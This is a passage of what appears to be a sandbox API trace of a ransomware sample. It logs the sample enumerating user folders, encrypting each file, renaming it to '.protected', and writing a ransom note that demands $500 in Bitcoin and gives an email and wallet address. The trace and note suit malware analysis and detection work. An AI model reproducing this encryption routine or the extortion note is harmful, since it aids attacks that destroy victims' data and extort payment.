lpString2="Program Files (x86)") returned -1 [0091.427] lstrcmpiW (lpString1="My Pictures", lpString2="$Recycle.bin") returned 1 [0091.427] lstrcmpiW (lpString1="My Pictures", lpString2="System Volume Information") returned -1 [0091.427] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures") returned 55 [0091.427] lstrcmpW (lpString1="My Pictures", lpString2=".") returned 1 [0091.427] lstrcmpW (lpString1="My Pictures", lpString2="..") returned 1 [0091.427] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*") returned 57 [0091.427] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0xffffffff [0091.427] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.427] lstrcmpiW (lpString1="My Shapes", lpString2="Windows") returned -1 [0091.427] lstrcmpiW (lpString1="My Shapes", lpString2="Program Files") returned -1 [0091.427] lstrcmpiW (lpString1="My Shapes", lpString2="Program Files (x86)") returned -1 [0091.427] lstrcmpiW (lpString1="My Shapes", lpString2="$Recycle.bin") returned 1 [0091.427] lstrcmpiW (lpString1="My Shapes", lpString2="System Volume Information") returned -1 [0091.427] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned 53 [0091.427] lstrcmpW (lpString1="My Shapes", lpString2=".") returned 1 [0091.427] lstrcmpW (lpString1="My Shapes", lpString2="..") returned 1 [0091.427] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*") returned 55 [0091.427] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0091.428] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.428] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.428] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.428] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.428] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.428] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\.") returned 55 [0091.428] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.428] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0091.428] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0091.428] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.428] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.428] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.428] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.428] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.428] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.428] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.428] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.428] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.428] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\..") returned 56 [0091.428] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.429] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.429] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0091.429] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0091.429] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.429] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.429] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.429] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.429] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0091.429] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0091.429] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0091.429] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0091.429] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0091.429] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini") returned 65 [0091.429] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0091.429] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0091.429] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.429] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.429] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.430] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini") returned 65 [0091.430] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0091.430] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini") returned 65 [0091.430] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0091.430] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini") returned 65 [0091.430] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0091.431] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0xd8, lpOverlapped=0x0) returned 1 [0091.432] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.432] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xd8, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0xd8, lpOverlapped=0x0) returned 1 [0091.432] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.432] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.432] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.432] CloseHandle (hObject=0xd4) returned 1 [0091.433] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini.protected") returned 75 [0091.433] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\desktop.ini.protected")) returned 1 [0091.435] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.435] lstrcmpiW (lpString1="Favorites.vss", lpString2="Windows") returned -1 [0091.435] lstrcmpiW (lpString1="Favorites.vss", lpString2="Program Files") returned -1 [0091.435] lstrcmpiW (lpString1="Favorites.vss", lpString2="Program Files (x86)") returned -1 [0091.435] lstrcmpiW (lpString1="Favorites.vss", lpString2="$Recycle.bin") returned 1 [0091.435] lstrcmpiW (lpString1="Favorites.vss", lpString2="System Volume Information") returned -1 [0091.435] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss") returned 67 [0091.435] StrStrIW (lpFirst="Favorites.vss", lpSrch=".protected") returned 0x0 [0091.435] lstrcmpW (lpString1="Favorites.vss", lpString2="RESTORE_FILES.txt") returned -1 [0091.435] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.435] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.435] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.435] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss") returned 67 [0091.436] StrStrW (lpFirst="Favorites.vss", lpSrch=".txt") returned 0x0 [0091.436] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss") returned 67 [0091.436] StrStrW (lpFirst="Favorites.vss", lpSrch=".rar") returned 0x0 [0091.436] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss") returned 67 [0091.436] StrStrW (lpFirst="Favorites.vss", lpSrch=".zip") returned 0x0 [0091.436] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x0, lpOverlapped=0x0) returned 1 [0091.436] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.436] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x0, lpOverlapped=0x0) returned 1 [0091.436] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.436] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.437] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.437] CloseHandle (hObject=0xd4) returned 1 [0091.438] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss.protected") returned 77 [0091.438] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss.protected")) returned 1 [0091.438] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.439] lstrcmpiW (lpString1="_private", lpString2="Windows") returned -1 [0091.439] lstrcmpiW (lpString1="_private", lpString2="Program Files") returned -1 [0091.439] lstrcmpiW (lpString1="_private", lpString2="Program Files (x86)") returned -1 [0091.439] lstrcmpiW (lpString1="_private", lpString2="$Recycle.bin") returned 1 [0091.439] lstrcmpiW (lpString1="_private", lpString2="System Volume Information") returned -1 [0091.439] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private") returned 62 [0091.439] lstrcmpW (lpString1="_private", lpString2=".") returned 1 [0091.439] lstrcmpW (lpString1="_private", lpString2="..") returned 1 [0091.439] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*") returned 64 [0091.439] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0091.465] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.466] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.466] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.466] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.466] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.466] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\.") returned 64 [0091.466] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.466] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0091.466] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0091.466] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0091.466] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0091.466] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.466] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0091.466] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.466] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.466] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.466] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.466] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.466] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\..") returned 65 [0091.466] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.466] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.466] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0091.466] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0091.466] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0091.466] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0091.467] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.467] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0091.467] lstrcmpiW (lpString1="folder.ico", lpString2="Windows") returned -1 [0091.467] lstrcmpiW (lpString1="folder.ico", lpString2="Program Files") returned -1 [0091.467] lstrcmpiW (lpString1="folder.ico", lpString2="Program Files (x86)") returned -1 [0091.467] lstrcmpiW (lpString1="folder.ico", lpString2="$Recycle.bin") returned 1 [0091.467] lstrcmpiW (lpString1="folder.ico", lpString2="System Volume Information") returned -1 [0091.467] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico") returned 73 [0091.467] StrStrIW (lpFirst="folder.ico", lpSrch=".protected") returned 0x0 [0091.467] lstrcmpW (lpString1="folder.ico", lpString2="RESTORE_FILES.txt") returned -1 [0091.467] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0091.467] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0091.467] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0091.468] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico") returned 73 [0091.468] StrStrW (lpFirst="folder.ico", lpSrch=".txt") returned 0x0 [0091.468] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico") returned 73 [0091.468] StrStrW (lpFirst="folder.ico", lpSrch=".rar") returned 0x0 [0091.468] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico") returned 73 [0091.468] StrStrW (lpFirst="folder.ico", lpSrch=".zip") returned 0x0 [0091.468] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0091.482] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.482] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0091.483] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.483] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0091.483] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0091.483] CloseHandle (hObject=0xd8) returned 1 [0091.484] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.protected") returned 83 [0091.484] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico.protected")) returned 1 [0091.485] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0091.485] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0091.485] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\RESTORE_FILES.txt") returned 80 [0091.485] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.486] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.486] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0091.487] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0091.487] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0091.487] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.487] WriteFile (in: hFile=0xd4, 